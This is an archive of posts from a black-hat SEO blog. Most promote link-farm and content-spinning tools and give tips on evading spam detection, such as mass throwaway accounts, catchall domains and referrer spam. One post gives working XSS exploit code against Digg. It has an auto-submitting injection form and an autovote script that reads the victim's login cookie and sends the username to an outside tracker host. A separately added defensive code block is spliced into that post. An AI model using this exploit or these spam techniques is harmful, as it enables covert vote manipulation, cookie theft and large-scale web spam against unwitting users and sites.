Archive for the 'Uncategorized' Category

Migrating Servers

Howdy everybody!

We are going to migrate http://getyacg.com and http://blackhatseo-blog.com today, so you should expect them to be offline for some hours.

We are going to pimp out everything, so you should expect faster and better forums and ticket system.

If you are a [YACG] Mass Installer or Link Farm Evolution customer, you can send us all your support inquiries to support@blackhatseo-blog.com while the ticket system is offline.

EDIT: Everything is back to normal now! We apologize for such a long downtime, all the open issues and e-mails will be answered shortly. Thank you for your patience.

DIM: Drive, Incentivate and Monetize!

Howdy!

We are going to start talking about an interesting strategy we’ve been using for quite a bit that we call DIM.

DIM is pretty simple to understand, but a bit complex on the execution. Here is a quick diagram to explain how it works:

DIM

In the following days we are going to cover every single step of this technique, and for those without background experience we are also going to show what tools you need to execute this.

This will be a case study too, so you will be able to see live examples of it – Some of them with a big, steady monthly income.

Link Farm Evolution: Best Practices I

This post is dedicated to our Link Farm Evolution customers. Special thanks to discodog and guerilla for providing us with cool tips!

You guys fucking rock. We fucking rock. Link Farm Evolution rocks.

Without further delay, we present you: Link Farm Evolution: Best Practices.

1. Create batches of 200 blogs at the same time

When you create blogs on Wordpress MU hosts keep in mind that some of them will fail due to errors on the hosts, not on LFE. Based on our tests and our users’ tests, we have found that when you create blogs on WPMU hosts, you will experience a success rate of 50% – 60%.

Bottom line, aim for more to reach your goal.

2. Tag your blogs properly

Tagging your blogs the right way is a key factor in the success of your linking strategy. Having your real estate organized has many benefits; one of them is doing interlinking the right way.

Let’s do a little exercise:

  1. Create 200 blogs with the tag “halloween 1”
  2. Create 200 blogs with the tag “halloween 2”
  3. Create 200 blogs with the tag “halloween 3”
  4. Export all the blogs under the tag “halloween 1” in .csv format.
  5. Go to your LFE and select all your blogs with the tag “halloween 3” and click “Put links on my blog xx”.
  6. Paste all the exported blogs (the ones with the tag “halloween 1”) to add them into the blogroll of the blogs tagged with “halloween 3” via the “Put my link on Blogroll” option.

Using this strategy your blogs tagged with “halloween 3” will randomly link from their blogroll to the blogs tagged with “halloween 1”. You can use the same strategy to link blogs tagged “halloween 2”, but remember not to interlink too much.

3. Don’t interlink your whole network

If you have a big network of blogs (>10k), never ever interlink them all. We can’t stress this enough, so we will repeat it one more time: Never interlink your whole network!

A better approach would be to have small niched networks of blogs (around 100-300 blogs) and then interlink them with other similar niched networks. (Remember the past exercise?)

In this case, if you get bitch-slapped by SERP’s you only lose a small amount of blogs instead of your whole network.

4. Set your cron job to run every 10 minutes.

Each time the cron job is triggered, it checks a batch of 50 activation emails. That means that if you create 200 blogs, the script will need to run 4 times to check all the activation emails. A shorter interval risks losing a couple of blogs because of delayed emails; a longer one wastes a lot of time.

Remember that you can also run your cron job manually by accessing http://yourdomain.com/pathtolfe/cron.php

5. Create your own catchall domains

Link Farm Evolution has access to many catchall domains for activation emails by default, but it’s more likely that your real estate won’t stick since you are using the same domains as everybody else. This point is even more important when targeting hosts like Wordpress.com, Blogger and Tumblr.

We will be adding more catchall domains every once in a while but we strongly encourage you guys to install your own. You will stay under the radar this way.

Of course as you all know, we offer the script and all the necessary support to create your own catchall domains.

6. Get free domains for your catchall domains

Don’t waste your dollars on .com or .net domains for your catchall domains. Go ahead and claim your free .co.cc domains.

You can get them at http://www.co.cc. They limit it to two free domains per account, but if you create more accounts you get more free domains (We know that you guys thought of that before reading this, so don’t give us that look!)

7. Allow a few days before publishing the first post

We have heard from a bunch of users that they leave their created blogs alone for a few days before posting something. This is because many times the webmaster of the host receives an automatic notification whenever a new blog is created and they might check it to see if it’s spammy. However, it is highly unlikely that they will check it down the road.

8. Start with a “clean” post and wait a few days.

Google is always crawling new sites and may recognize obvious spammy content. For your first post we suggest adding something not spammy, like an introductory post and a couple of pics from Flickr.

Yes, we know it’s not interesting… But let’s be honest, it will be more interesting than all your dirty spam :P

9. Contextual Links: Smart link on your posts

Make contextual links. You can use the integrated content spinning tools to create relevant links on your posts.

To do that, change the editor mode to “HTML CODE” and use:

<a href="{ http://someblog.tumblr.com | http://someblog.blogger.com | http://someblog.wpmuhost.com }">{anchor text 1 | anchor text 2 | anchor text3}</a>

Export the links into .csv from LFE beforehand to choose the links you want to create.

10. For the love of God and everything that is pure in this world, spin your content

You can use the content spinning on several levels, for example:

{Today it is fine to Paris | In Paris today it is nice | It’s a beautiful day in Paris}

And you can also do recursive spinning like:

Today : {Today | This Morning | The afternoon | Tonight | This lunchtime}
Paris: {Rome | Paris | Prague | New York | Tokyo | Las Vegas}
Fine: {Fine | ugly | Cold | Hot | right}

And if we add the spun words to the spun sentences:

{{Today | This Morning | The afternoon | Tonight | This lunchtime} it is {Fine | ugly | Cold | Hot | right} to {Rome | Paris | Prague | New York | Tokyo | Las Vegas} | In {Rome | Paris | Prague | New York | Tokyo | Las Vegas} {Today | This Morning | The afternoon | Tonight | This lunchtime} it is {Fine | ugly | Cold | Hot | right| nice} | It’s a {Fine | ugly | Cold | Hot | right|beautiful} day in {Rome | Paris | Prague | New York | Tokyo | Las Vegas}}

Your posts will have a similarity of about 10%-15%

11. Create links to your blogs

To have a killer blog network, you need to drop some juice to your real estate.

50 links from some juicy domains spread around your blogs will do the job. You can use our integrated Pligg tool to post your blogs to thousands of Pligg sites, or you can use the old-not recommended-boring but still popular spammy techniques like guest books, referrer spam etc.

You could also use commercial tools like Bookmarking Demon and Onlywire to submit your blogs to social bookmarking sites.

12. Link to other sites

In order to stay under the radar, you must look legit. Have you ever seen a site without a single link to another site? No. So don’t be cheap and send some link juice to related sites such as Wikipedia articles or other niched sites.

Send us your tips to support [at] blackhatseo-blog [dot] com if you want them to get featured on the sequel of this saga.

How We Gamed Digg for Fun and Profit!

Disclaimer: This post was written to raise awareness about the importance of protecting your sites against this kind of attack. Even though all the technical stuff (including the XSS!) is real, the actual story of what we supposedly did is not — We just wanted to spice things up a bit. Keep in mind that Digg is one of the most visited sites in the world and they must have a whole team of experts dedicated to protecting themselves against this kind of stuff, don’t they? :)

Almost a year and a half ago we learned about an undisclosed XSS hole in Digg.com thanks to Beni. He is an outstanding security researcher and author of pretty sick stuff like this Digg, Delicious, Netscape and Technorati XSS Worm.

The actual XSS hole is this:

Removed after a long talk with my crew because there is the *possibility* that the XSS vector could be used as an SQL Injection too.

For those who aren’t tech savvy enough, we are going to try to explain everything so you can get a grasp about the importance of this kind of holes.

XSS is a type of computer security vulnerability typically found in web applications, which allows malicious web users to inject code into the web pages viewed by other users. Vulnerabilities of this type are useful for getting around the same origin policy that is implemented in all modern browsers. In a nutshell, this policy permits scripts running on pages originating from the same site to access each other’s content with no specific restrictions — but prevents access to the content across pages on different sites.

For example, if we access http://asd.com and a script is executed, that script will be able to access http://asd.com/*.html. However, it won’t be able to read anything located at http://jkl.com or even at http://subdomain.asd.com.

Now let’s examine Digg’s architecture, starting with their voting button:

<form action="/digremote" id="f1" name="f1" method="post" target="_top">
<input type="hidden" name="digcheck" value="00000000000000000000000000000000" />
<input type="hidden" name="id" value="10797160" />
...
<li class="digg-it" id="diglink1"><a href="#" onclick="document.getElementById('f1').submit(); return false" target="_top">digg it</a></li>
...
</form>
...
<script type="text/javascript">var s_account = "diggcomsyndication";</script>
<script src="http://media.digg.com/js/loader/261/omnidiggthis" type="text/javascript"></script>
<script type="text/javascript"><!--
s.pageName = 'diggthis:digg';
s.prop9 = 'diggthis:default';
s.prop24 = 'diggthis::comedy';
s.prop29 = 'news';
s.prop4 = '00000000000000000000000000000000';
s.prop21 = 'diggthis';
s.prop22 = 'diggthis:';
s.prop23 = 'diggthis::comedy';
s.hier1 = 'diggthis,,comedy';
s.prop14 = 'diggthis:default';
s.prop8 = 'logged-in';
s.channel = 'digg.com';
var s_code=s.t();
if (s_code) document.write(s_code);
//--></script>
...

The code above will generate a button similar to this one:

Digg button @ http://cracked.com

In order to prevent a CSRF attack to autovote stories, Digg implemented the digcheck value. If you are a mean webmaster and you want to autovote your story from your visitors accounts without their knowledge, you would need to obtain the digcheck value and the Digg cookie of each visitor. There are various ways of obtaining those two bits of information, but in this case we are going to use the XSS vulnerability.

The best way of learning is doing-it-yourself, so open up the Firebug console while browsing Digg (make sure you are logged in) and execute the following script:

c = document.cookie;
l = 'loginn';
u = c.substr(c.indexOf(l)+10,c.indexOf(';',c.indexOf(l))-c.indexOf(l)-10);
alert(u);

You will see your username in an alert box since you are running the script inside Digg.com. You can achieve the same effect using the XSS, or you could use it to do something more interesting like autovoting.
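
Seen from the defending side, what this section describes depends on three things: a request parameter echoed into the page as markup, a login cookie that page script can read, and no restriction on where scripts may load from. The block below is an added example (not code from the original post and not Digg's code) showing a control for each; the page template, the cookie value, the `theme` cookie and the script-src policy are constructed assumptions, and the policy check is a simplified model of origin matching.

```javascript
// Added example: constructed template and values, not Digg's code.

// Encode the characters that matter in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// "Before": the request parameter is concatenated into the page as markup.
function renderUnsafe(param) {
  return '<p>Results for ' + param + '</p>';
}

// "After": the same template with output encoding at the point of use.
function renderSafe(param) {
  return '<p>Results for ' + escapeHtml(param) + '</p>';
}

// Session cookie with HttpOnly so page script cannot read it, plus
// Secure and SameSite to narrow when the browser sends it.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Model of what document.cookie exposes: HttpOnly cookies are left out.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*httponly\b/i.test(h))
    .map((h) => h.split(';')[0])
    .join('; ');
}

// Simplified script-src check: the list holds 'self' or scheme://host origins.
// (A real browser also handles paths, wildcards, nonces and inline script.)
function cspAllowsScript(scriptSrc, pageUrl, scriptUrl) {
  const target = new URL(scriptUrl, pageUrl).origin;
  const self = new URL(pageUrl).origin;
  return scriptSrc.split(/\s+/).some((src) =>
    (src === "'self'" ? target === self : src === target));
}

// The injected value from the post, URL-decoded.
const payload = '<script src=http://host.tdl/autovote.js>';
const pageUrl = 'http://digg.com/comedy/constructed-story';
const policy = "'self' http://media.digg.com"; // constructed policy

console.log(renderUnsafe(payload)); // the tag reaches the browser as markup
console.log(renderSafe(payload));   // the tag is rendered as inert text

const headers = [sessionCookie('loginn', 'constructed-user'), 'theme=dark; Path=/'];
console.log(scriptVisibleCookies(headers)); // only the non-HttpOnly cookie

console.log(cspAllowsScript(policy, pageUrl, 'http://host.tdl/autovote.js'));
console.log(cspAllowsScript(policy, pageUrl, '/js/app.js'));
```

Output encoding is the fix for the hole itself; the cookie flags and the script-src policy limit what an injected script can do if another injection point is missed. The digcheck value gives no protection here because it sits in the page markup, where any script running in the origin can read it.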

Our “setup” for autovoting can be explained with this diagram:

Diagram

The exploit is pretty straight forward, and it consists of two files. The first file sends a POST request to the vulnerable page to inject a script:

<form action="post.php" method="post">
<div><input type="submit" /></div>
</form>
<script type="text/javascript">
<!--
with (document.forms[0]) {
	action="http://digg.com/vulnerablepage?vulnerablevariable=<script src=http%3A%2F%2Fhost.tdl%2Fautovote.js>";
	submit();
}
-->
</script>

The second file is the actual script that autovotes the post in the “money” site:

var url = 'http://digg.com/comedy/7_Items_You_Won_t_Believe_Are_Actually_Legal';
new Ajax.Request(url,
	{
		method:'post',
		onSuccess:function(t) {
			t = t.responseText;
			a = 'javascript:dig(';
			if (t.indexOf(a) > 0) {
				i = t.indexOf('s.prop18 = \'')+12;
				i = t.substr(i,t.indexOf('\'',i)-i);
				a = t.substr(t.indexOf(',',t.indexOf(',',t.indexOf(a)+a.length)+1)+2,32);
				p = 'id='+i+'&row=5&digcheck='+a+'&type=s&loc=other';	
				new Ajax.Request('http://digg.com/diginfull', { 
					method:'post',
					parameters:p, 
					onSuccess:function(t) {
						new Ajax.Request(url, {
							method:'post',
							onSuccess:function(t) {
								if (t.responseText.indexOf('dugg') > 0) {
									c = document.cookie;
									l = 'loginn';
									u = c.substr(c.indexOf(l)+10,c.indexOf(';',c.indexOf(l))-c.indexOf(l)-10);
									var s = 'http://host.tdl/tracker.php?user='+u;
									document.body.innerHTML+='<img src="'+s+'" />';
								}
							}	
						});
					}
				});
			}
		}
	});

Of course we couldn’t leave it like this, so we took things a step further and we implemented a lot more goodies. One of them was this neat css history hack thingy, to check if the visitor actually came from Digg. Another thing we implemented, the cherry on the pie, is this:

Twitter Robot

We had a mother fucker robot that informed us anytime someone Digged one of our stories. Yes, a freakin’ XSS exploit communicating with us via tweets.

We rule so bad.

Content is NOT important

Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. (…)

I could make an entire post like that with nothing but rubbish content and it wouldn’t matter. Why? Because content doesn’t matter, backlinks do.

Ok, that might sound a bit exaggerated… And I must admit, whenever I work on a site I spend more time working with the content than anything else (Even in my blackhat ventures like [YACG], it’s pretty evident that I make a big deal out of content).

In fact, you know what? Scratch everything I just said. Content IS important, but it all depends on what you are trying to achieve.  I make a big deal out of it because of the usability of the website. Because Good content = Returning visitors, and we all know that.

But in the particular case of rankings, backlinks are much more important than content. Let’s take as an example the keyword “click here”:

Google results for "click here"

Bing results for "click here"

Interesting. Now let’s take a look at “worst band in the world”:

Google results for "worst band in the world"

*I firebug’ed out the first results for the sake of the length of this post

It’s evident that there’s not a single mention of “click here” or “worst band in the world” in those sites, but still they are ranking #1 for those keywords. Why? Simple, there’s a bunch of backlinks with that anchor text pointing to those sites.

(Bullshit alert!)

I’ve done some extensive testing over the past couple of years using neural networks, statistical analysis, midgets and large quantities of vodka… And I think I figured out how Google’s algorithm works. I’m planning on releasing a paper later on, but here’s the basic formula:

Google's algorithm

Where K is Google’s magic constant (100), 0.1 is the position you want (0.1 for #1, 0.2 for #2, 1.1 for #11 etc…), x1 is the number of words in the page you want to rank (without counting the keyword you want to rank for), x2 is the number of times the keyword appears on the page and f(x1,x2) is an approximation to the number of backlinks with the keyword as anchor that you need.

You don’t believe me? Let’s try it out with http://get.adobe.com/reader/ for “click here” on #1 position. I used for this experiment this word count tool and Yahoo! Site Explorer.

Google's Algorithm (2)

Google's Algorithm (3)

According to Yahoo! Site Explorer, http://get.adobe.com/reader/ has 652,799 backlinks.

Yes, this is the moment when you go all HOLY-MOTHER-OF-GOD at your computer screen and nearby peers.

(Bullshit alert is over!)

Bottom line: Looking for rankings? Focus on backlinks.

[YACG] 3.9 has just been released. Grab it while it’s hot!

The best damn content generator in the world has just been updated. Get the details at http://getyacg.com/yacg-3-9.

Double the goodness, half the file size. Still open source and free!

Get higher positions in SERPs and wicked-fast indexing by search engines with thousands of free one-way links

Link Farm Evolution is the tool that allows you to harness the power of social media platforms such as Wordpress Multi-User, Pligg and Blogger to build a vast link farm. Open-source and wide-spread, those platforms allow you to get quality links on thousands of unique domains in unlimited quantities. And the best part is that you don’t have to pay a thing or do any manual labor to do that. – We even take care of captchas for you :)

Check out this general overview of what is Link Farm Evolution:

It’s Time to Make Investments That Pay off — Get Link Farm Evolution Right Now at http://linkfarmevolution.com

Abandoned project turned into a monster

Holy shit, do you remember my black hat command center? It was an attempt to manage my whole inventory of domains, sites, accounts and integrate all the scripts that I was using at that time (Social bookmarking, sitemap submitter, trackback spammer, social bookmarking etc…) Unfortunately, I got involved in a lot of other projects and I never really had the time to develop my pet project to its full potential.

It’s been abandoned for over a year now, but for some reason I never took it offline. Yesterday was one of those days that I don’t know why I decided to login again and found this.

Network Operation Center

It’s been scraping keyw0rds and sending trackbacks like crazy (Talk about reliability!)…

  • This system had a cron that scraped the daily search trends, and then scraped and generated longtails for each daily trend (+250,000 longtails)
  • Then, after doing a bunch of other internal processes it scraped blogs related to each longtail and did a couple of tests to see if you could send a trackback to the blog. (+2,500,000 blogs sorted by longtail that accept trackbacks from my script)
  • +80,000 fresh and tested proxies
  • +20,000 IPs from search engines

Too bad I turned off the content generation to keep the load down on my server, because I would have a database with unique human readable content for +250,000 longtails.

I wonder what would have happened if I had left a couple of sites running on auto mode on the system with all turned on.

Try Google AdWords with $250 in free advertising

There’s not much to say about this promotion other than it expires on January 31, 2009. To claim your coupon, please go to:

http://www.google.com/ads/250/v.html

Back from Europe

I know things have been a bit slow lately, but that was because I was taking some well deserved vacations.

This week I’ll start catching up with all the emails, posts and comments.